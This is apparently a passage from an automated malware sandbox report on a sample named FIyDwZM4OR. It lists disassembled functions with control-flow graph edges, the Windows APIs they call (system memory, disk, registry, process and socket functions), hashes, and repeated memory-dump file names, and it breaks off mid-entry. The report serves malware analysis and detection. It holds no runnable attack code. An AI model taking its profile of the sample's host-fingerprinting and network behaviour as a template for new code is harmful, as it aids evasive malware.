                                                              • GlobalMemoryStatusEx.KERNELBASE ref: 00E925CC
                                                              • GetDriveTypeA.KERNELBASE ref: 00E92647
                                                              • GetDiskFreeSpaceExA.KERNELBASE ref: 00E9267E
                                                              • KiUserCallbackDispatcher.NTDLL ref: 00E927E2
                                                              • FindFirstFileW.KERNELBASE ref: 00E928F8
                                                              • FindNextFileW.KERNELBASE ref: 00E9291F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                              • String ID: ;%$@$`
                                                              • API String ID: 3271271169-3130814153
                                                              • Opcode ID: 6bd5817af0586be70f4003ca0afd9a876271906984aaf9d1ce47c14a2f537347
                                                              • Instruction ID: a0434695b3427bc4aee2a911659b8703fe896af1c00ca90d3c200ca9080ebecd
                                                              • Opcode Fuzzy Hash: 6bd5817af0586be70f4003ca0afd9a876271906984aaf9d1ce47c14a2f537347
                                                              • Instruction Fuzzy Hash: 78D1B6B49053199FCB14EF68C59469EBBF0BF48348F01896DE898D7354E7349A88CF92
                                                              Function 00E929FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 954 e929ff-e92a2f FindFirstFileA 955 e92a38 954->955 956 e92a31-e92a36 954->956 957 e92a3d-e92a91 call 1319c50 call 1319ce0 RegOpenKeyExA 955->957 956->957 962 e92a9a 957->962 963 e92a93-e92a98 957->963 964 e92a9f-e92b0c call 1319c50 call 1319ce0 CharUpperA call 1218da0 962->964 963->964 972 e92b0e-e92b13 964->972 973 e92b15 964->973 974 e92b1a-e92b92 call 1319c50 call 1319ce0 call 1218e80 call 1218e70 972->974 973->974 983 e92bcc-e92c66 QueryFullProcessImageNameA CloseHandle call 1218da0 974->983 984 e92b94-e92ba3 974->984 994 e92c68-e92c6d 983->994 995 e92c6f 983->995 987 e92bb0-e92bc0 call 1218e68 984->987 988 e92ba5-e92bae 984->988 991 e92bc5-e92bca 987->991 988->983 991->983 991->984 996 e92c74-e92ce9 call 1319c50 call 1319ce0 call 1218e80 call 1218e70 994->996 995->996 1005 e92dcf-e92e1c call 1319c50 call 1319ce0 CloseHandle 996->1005 1006 e92cef-e92d49 call 1218bb0 call 1218da0 996->1006 1047 e92e21 call 71b0e0b 1005->1047 1048 e92e21 call 71b0e4a 1005->1048 1049 e92e21 call 71b0dea 1005->1049 1050 e92e21 call 71b0ddc 1005->1050 1051 e92e21 call 71b0e22 1005->1051 1017 e92d99-e92dad 1006->1017 1018 e92d4b-e92d63 call 1218da0 1006->1018 1015 e92e23-e92e2e 1019 e92e30-e92e35 1015->1019 1020 e92e37 1015->1020 1017->1005 1018->1017 1026 e92d65-e92d7d call 1218da0 1018->1026 1022 e92e3c-e92ed6 call 1319c50 call 1319ce0 1019->1022 1020->1022 1036 e92ed8-e92ee1 1022->1036 1037 e92eea 1022->1037 1026->1017 1032 e92d7f-e92d97 call 1218da0 1026->1032 1032->1017 1040 e92daf-e92dc9 call 1218e68 1032->1040 1036->1037 1038 e92ee3-e92ee8 1036->1038 1039 e92eef-e92f16 call 1319c50 call 1319ce0 1037->1039 1038->1039 1040->1005 1040->1006 1047->1015 1048->1015 1049->1015 1050->1015 1051->1015
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                              • String ID: 0
                                                              • API String ID: 2406880114-4108050209
                                                              • Opcode ID: 572db9099ecdf94b2637e3b51358e6c93385103f36abeefb86851519e10c0d0d
                                                              • Instruction ID: cea214daaa10ef04d12a638ebeadc7fb8203f978daffc802202a7d11b8f60807
                                                              • Opcode Fuzzy Hash: 572db9099ecdf94b2637e3b51358e6c93385103f36abeefb86851519e10c0d0d
                                                              • Instruction Fuzzy Hash: B7E1E7B49053059FCB10EF69D98469DBBF4AF58308F00887EE998DB354E7359988CF42
                                                              Function 00EA05B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1199 ea05b0-ea05b7 1200 ea07ee 1199->1200 1201 ea05bd-ea05d4 1199->1201 1202 ea05da-ea05e6 1201->1202 1203 ea07e7-ea07ed 1201->1203 1202->1203 1204 ea05ec-ea05f0 1202->1204 1203->1200 1205 ea05f6-ea0620 call ea7350 call e970b0 1204->1205 1206 ea07c7-ea07cc 1204->1206 1211 ea066a-ea068c call ecdec0 1205->1211 1212 ea0622-ea0624 1205->1212 1206->1203 1217 ea0692-ea06a0 1211->1217 1218 ea07d6-ea07e3 call ea7380 1211->1218 1213 ea0630-ea0655 call e970d0 call ea03c0 call ea7450 1212->1213 1241 ea065b-ea0668 call e970e0 1213->1241 1242 ea07ce 1213->1242 1220 ea06a2-ea06a4 1217->1220 1221 ea06f4-ea06f6 1217->1221 1218->1203 1224 ea06b0-ea06e4 call ea73b0 1220->1224 1226 ea07ef-ea082b call ea3000 1221->1226 1227 ea06fc-ea06fe 1221->1227 1224->1218 1240 ea06ea-ea06ee 1224->1240 1238 ea0a2f-ea0a35 1226->1238 1239 ea0831-ea0837 1226->1239 1231 ea072c-ea0754 1227->1231 1236 ea075f-ea078b 1231->1236 1237 ea0756-ea075b 1231->1237 1255 ea0700-ea0703 1236->1255 1256 ea0791-ea0796 1236->1256 1243 ea075d 1237->1243 1244 ea0707-ea0719 WSAEventSelect 1237->1244 1250 ea0a3c-ea0a52 1238->1250 1251 ea0a37-ea0a3a 1238->1251 1246 ea0839-ea084c call ea6fa0 1239->1246 1247 ea0861-ea087e 1239->1247 1240->1224 1249 ea06f0 1240->1249 1241->1211 1241->1213 1242->1218 1245 ea0723-ea0726 1243->1245 1244->1218 1253 ea071f 1244->1253 1245->1226 1245->1231 1263 ea0a9c-ea0aa4 1246->1263 1264 ea0852 1246->1264 1266 ea0882-ea088d 1247->1266 1249->1221 1250->1218 1257 ea0a58-ea0a81 call ea2f10 1250->1257 1251->1250 1253->1245 1255->1244 1256->1255 1260 ea079c-ea07c2 call e976a0 1256->1260 1257->1218 1272 ea0a87-ea0a97 call ea6df0 1257->1272 1260->1255 1263->1218 1264->1247 1268 ea0854-ea085f 1264->1268 1270 ea0893-ea08b1 1266->1270 1271 ea0970-ea0975 1266->1271 1268->1266 1275 ea08c8-ea08f7 1270->1275 1273 ea097b-ea0989 call e970b0 1271->1273 1274 ea0a19-ea0a2c 1271->1274 1272->1218 1273->1274 1284 ea098f-ea099e 1273->1284 1274->1238 1282 ea08f9-ea08fb 1275->1282 1283 ea08fd-ea0925 1275->1283 1285 ea0928-ea093f 1282->1285 1283->1285 1286 ea09b0-ea09c1 call e970d0 1284->1286 1292 ea08b3-ea08c2 1285->1292 1293 ea0945-ea096b 1285->1293 1290 ea09c3-ea09c7 1286->1290 1291 ea09a0-ea09ae call e970e0 1286->1291 1294 ea09e8-ea0a03 WSAEnumNetworkEvents 1290->1294 1291->1274 1291->1286 1292->1271 1292->1275 1293->1292 1296 ea09d0-ea09e6 WSAEventSelect 1294->1296 1297 ea0a05-ea0a17 1294->1297 1296->1291 1296->1294 1297->1296
                                                              APIs
                                                              • WSAEventSelect.WS2_32(?,?,?), ref: 00EA0712
                                                              • WSAEventSelect.WS2_32(?,?,00000000), ref: 00EA09DD
                                                              • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00EA09FB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: EventSelect$EnumEventsNetwork
                                                              • String ID: N=$multi.c
                                                              • API String ID: 2170980988-1544942961
                                                              • Opcode ID: 83c786f946a5785352067e00c88c7e802a52468c4d4a1fb03bccb35388d5ff87
                                                              • Instruction ID: e98acf648286af57b101d23581c26f0f56bd69b5c5c0bc5894751a8fbfbcc7a6
                                                              • Opcode Fuzzy Hash: 83c786f946a5785352067e00c88c7e802a52468c4d4a1fb03bccb35388d5ff87
                                                              • Instruction Fuzzy Hash: 86D1BF756083019FEB10DF24C881BAB77E5FF9A348F04582DF885AA252E774F958CB52
                                                              Function 00E97770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1449 e97770-e9778e 1450 e97790-e97797 1449->1450 1451 e977b6-e977c2 recv 1449->1451 1450->1451 1452 e97799-e977a1 1450->1452 1453 e9782e-e97832 1451->1453 1454 e977c4-e977d9 call e972a0 1451->1454 1455 e977db-e97829 call e972a0 call e9cb20 call 1218c50 1452->1455 1456 e977a3-e977b4 1452->1456 1454->1453 1455->1453 1456->1454
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: recv
                                                              • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                              • API String ID: 1507349165-640788491
                                                              • Opcode ID: 66727a175ac549bd239750a93b1463eabd91f1fc0710b8b813d3c5745a3ee211
                                                              • Instruction ID: 79eb632cf501fdee9899880793a608709fd4e8d6e17846d60de1b9fa22cda5f7
                                                              • Opcode Fuzzy Hash: 66727a175ac549bd239750a93b1463eabd91f1fc0710b8b813d3c5745a3ee211
                                                              • Instruction Fuzzy Hash: 841108B46283447BE930A626DC49E273B9CDB81B78F55152DB89877291E1319C0C86F2
                                                              Function 00EA6FA0 Relevance: 6.3, APIs: 4, Instructions: 261COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1590 ea6fa0-ea6fd2 1591 ea6feb-ea6ff1 1590->1591 1592 ea6fd4-ea6fd6 1590->1592 1594 ea6ff7-ea6ff9 1591->1594 1595 ea7324-ea7330 1591->1595 1593 ea6fe0-ea6fe4 1592->1593 1596 ea701b-ea7041 1593->1596 1597 ea6fe6-ea6fe9 1593->1597 1598 ea6fff-ea7016 1594->1598 1599 ea7186-ea7196 1594->1599 1600 ea7060-ea7074 1596->1600 1597->1591 1597->1593 1598->1595 1599->1595 1603 ea7076-ea7081 1600->1603 1604 ea7057-ea705a 1600->1604 1603->1604 1606 ea7083-ea7089 1603->1606 1604->1600 1605 ea7172-ea7174 1604->1605 1607 ea719b-ea71a8 1605->1607 1608 ea7176-ea7184 1605->1608 1609 ea708b-ea708f 1606->1609 1610 ea70dc-ea70df 1606->1610 1613 ea71f1-ea722d call ead7f0 select 1607->1613 1614 ea71aa-ea71be 1607->1614 1608->1613 1615 ea70b0-ea70bd 1609->1615 1616 ea7091 1609->1616 1611 ea712c-ea7132 1610->1611 1612 ea70e1-ea70e5 1610->1612 1611->1604 1621 ea7138-ea713c 1611->1621 1617 ea7100-ea710d 1612->1617 1618 ea70e7 1612->1618 1641 ea730b 1613->1641 1642 ea7233-ea723e 1613->1642 1619 ea730d-ea7310 1614->1619 1620 ea71c4-ea71c6 1614->1620 1624 ea70bf-ea70ce 1615->1624 1625 ea70d5 1615->1625 1622 ea70a0-ea70a7 1616->1622 1628 ea710f-ea711e 1617->1628 1629 ea7125 1617->1629 1627 ea70f0-ea70f7 1618->1627 1619->1595 1626 ea7312-ea7322 1619->1626 1630 ea71cc-ea71e6 1620->1630 1631 ea7331-ea7344 1620->1631 1632 ea713e 1621->1632 1633 ea714d-ea715a 1621->1633 1622->1615 1634 ea70a9-ea70ac 1622->1634 1624->1625 1625->1610 1626->1595 1627->1617 1636 ea70f9-ea70fc 1627->1636 1628->1629 1629->1611 1630->1595 1652 ea71ec 1630->1652 1631->1595 1651 ea7346 1631->1651 1637 ea7140-ea7144 1632->1637 1639 ea7050 1633->1639 1640 ea7160-ea716d 1633->1640 1634->1622 1638 ea70ae 1634->1638 1636->1627 1645 ea70fe 1636->1645 1637->1633 1648 ea7146-ea7149 1637->1648 1638->1615 1639->1604 1640->1639 1641->1619 1643 ea725c-ea7269 1642->1643 1649 ea726b-ea727b __WSAFDIsSet 1643->1649 1650 ea7253-ea7256 1643->1650 1645->1617 1648->1637 1653 ea714b 1648->1653 1654 ea729a-ea72ac __WSAFDIsSet 1649->1654 1655 ea727d-ea7287 1649->1655 1650->1595 1650->1643 1651->1626 1652->1626 1653->1633 1658 ea72ba-ea72c9 __WSAFDIsSet 1654->1658 1659 ea72ae-ea72b3 1654->1659 1656 ea7289 1655->1656 1657 ea728e-ea7293 1655->1657 1656->1657 1657->1654 1660 ea7295 1657->1660 1662 ea72cf-ea72f6 1658->1662 1663 ea7240 1658->1663 1659->1658 1661 ea72b5 1659->1661 1660->1654 1661->1658 1664 ea7245-ea724c 1662->1664 1665 ea72fc-ea7306 1662->1665 1663->1664 1664->1650 1665->1664
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a244310c90b7df6a64e2d372d9e6380241a24eec01750d8a0f36ee09f8b97aa2
                                                              • Instruction ID: 3ed4ed540105482bd680bfb4dc21a81cae62cd8c20c46dd1d4b691b4756913ff
                                                              • Opcode Fuzzy Hash: a244310c90b7df6a64e2d372d9e6380241a24eec01750d8a0f36ee09f8b97aa2
                                                              • Instruction Fuzzy Hash: 729102302093094BD735CA288CD07BB72D5EFDA368F15AB2CE8D95B1D4EB74AC40D691
                                                              Function 00F5B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1666 f5b180-f5b195 1667 f5b3e0-f5b3e7 1666->1667 1668 f5b19b-f5b1a2 1666->1668 1669 f5b1b0-f5b1b9 1668->1669 1669->1669 1670 f5b1bb-f5b1bd 1669->1670 1670->1667 1671 f5b1c3-f5b1d0 1670->1671 1673 f5b1d6-f5b1f2 1671->1673 1674 f5b3db 1671->1674 1675 f5b229-f5b22d 1673->1675 1674->1667 1676 f5b233-f5b246 1675->1676 1677 f5b3e8-f5b417 1675->1677 1678 f5b260-f5b264 1676->1678 1679 f5b248-f5b24b 1676->1679 1685 f5b582-f5b589 1677->1685 1686 f5b41d-f5b429 1677->1686 1683 f5b269-f5b286 call f5af30 1678->1683 1680 f5b215-f5b223 1679->1680 1681 f5b24d-f5b256 1679->1681 1680->1675 1684 f5b315-f5b33c call 1218b00 1680->1684 1681->1683 1694 f5b2f0-f5b301 1683->1694 1695 f5b288-f5b2a3 call f5b060 1683->1695 1697 f5b342-f5b347 1684->1697 1698 f5b3bf-f5b3ca 1684->1698 1689 f5b435-f5b44c call f5b590 1686->1689 1690 f5b42b-f5b433 call f5b590 1686->1690 1707 f5b44e-f5b456 call f5b590 1689->1707 1708 f5b458-f5b471 call f5b590 1689->1708 1690->1689 1694->1680 1711 f5b307-f5b310 1694->1711 1714 f5b200-f5b213 call f5b020 1695->1714 1715 f5b2a9-f5b2c7 getsockname call f5b020 1695->1715 1704 f5b384-f5b38f 1697->1704 1705 f5b349-f5b358 1697->1705 1702 f5b3cc-f5b3d9 1698->1702 1702->1667 1704->1698 1713 f5b391-f5b3a5 1704->1713 1712 f5b360-f5b382 1705->1712 1707->1708 1724 f5b473-f5b487 1708->1724 1725 f5b48c-f5b4a7 1708->1725 1711->1702 1712->1704 1712->1712 1720 f5b3b0-f5b3bd 1713->1720 1714->1680 1722 f5b2cc-f5b2dd 1715->1722 1720->1698 1720->1720 1722->1680 1726 f5b2e3 1722->1726 1724->1685 1727 f5b4b3-f5b4cb call f5b660 1725->1727 1728 f5b4a9-f5b4b1 call f5b660 1725->1728 1726->1711 1733 f5b4cd-f5b4d5 call f5b660 1727->1733 1734 f5b4d9-f5b4f5 call f5b660 1727->1734 1728->1727 1733->1734 1739 f5b4f7-f5b50b 1734->1739 1740 f5b50d-f5b52b call f5b770 * 2 1734->1740 1739->1685 1740->1685 1745 f5b52d-f5b531 1740->1745 1746 f5b580 1745->1746 1747 f5b533-f5b53b 1745->1747 1746->1685 1748 f5b53d-f5b547 1747->1748 1749 f5b578-f5b57e 1747->1749 1748->1749 1750 f5b549-f5b54d 1748->1750 1749->1685 1750->1749 1751 f5b54f-f5b558 1750->1751 1751->1749 1752 f5b55a-f5b576 call f5b870 * 2 1751->1752 1752->1685 1752->1749
                                                              APIs
                                                              • getsockname.WS2_32(-00000020,-00000020,?), ref: 00F5B2B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: ares__sortaddrinfo.c$cur != NULL
                                                              • API String ID: 3358416759-2430778319
                                                              • Opcode ID: 35d30b13f357446202677d2d79789a4905bbb6d659e7e35a94996da8ef37573f
                                                              • Instruction ID: d49d248de7ae8403108498e7503f2db8684e79ec9c7415a90088168cb7b16a2e
                                                              • Opcode Fuzzy Hash: 35d30b13f357446202677d2d79789a4905bbb6d659e7e35a94996da8ef37573f
                                                              • Instruction Fuzzy Hash: B2C18F31A043059FD718DF24C880A6A77E1FF88355F19886CFA459B3A5E734ED49DB81
                                                              Function 07170138 Relevance: 1.9, APIs: 1, Instructions: 397COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a10f70333d6cc926e739aad54e7f42824baf7df601665c8fdeb7780fa3da2864
                                                              • Instruction ID: 29173175ab4ca2db2b611462963dae2da2d9642d8aef9784affac385857608dc
                                                              • Opcode Fuzzy Hash: a10f70333d6cc926e739aad54e7f42824baf7df601665c8fdeb7780fa3da2864
                                                              • Instruction Fuzzy Hash: 8981F5FB26C321BD720A91815F649FB6B7EE5CB730B32842AF403D6582F3944E499171
                                                              Function 00E931D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
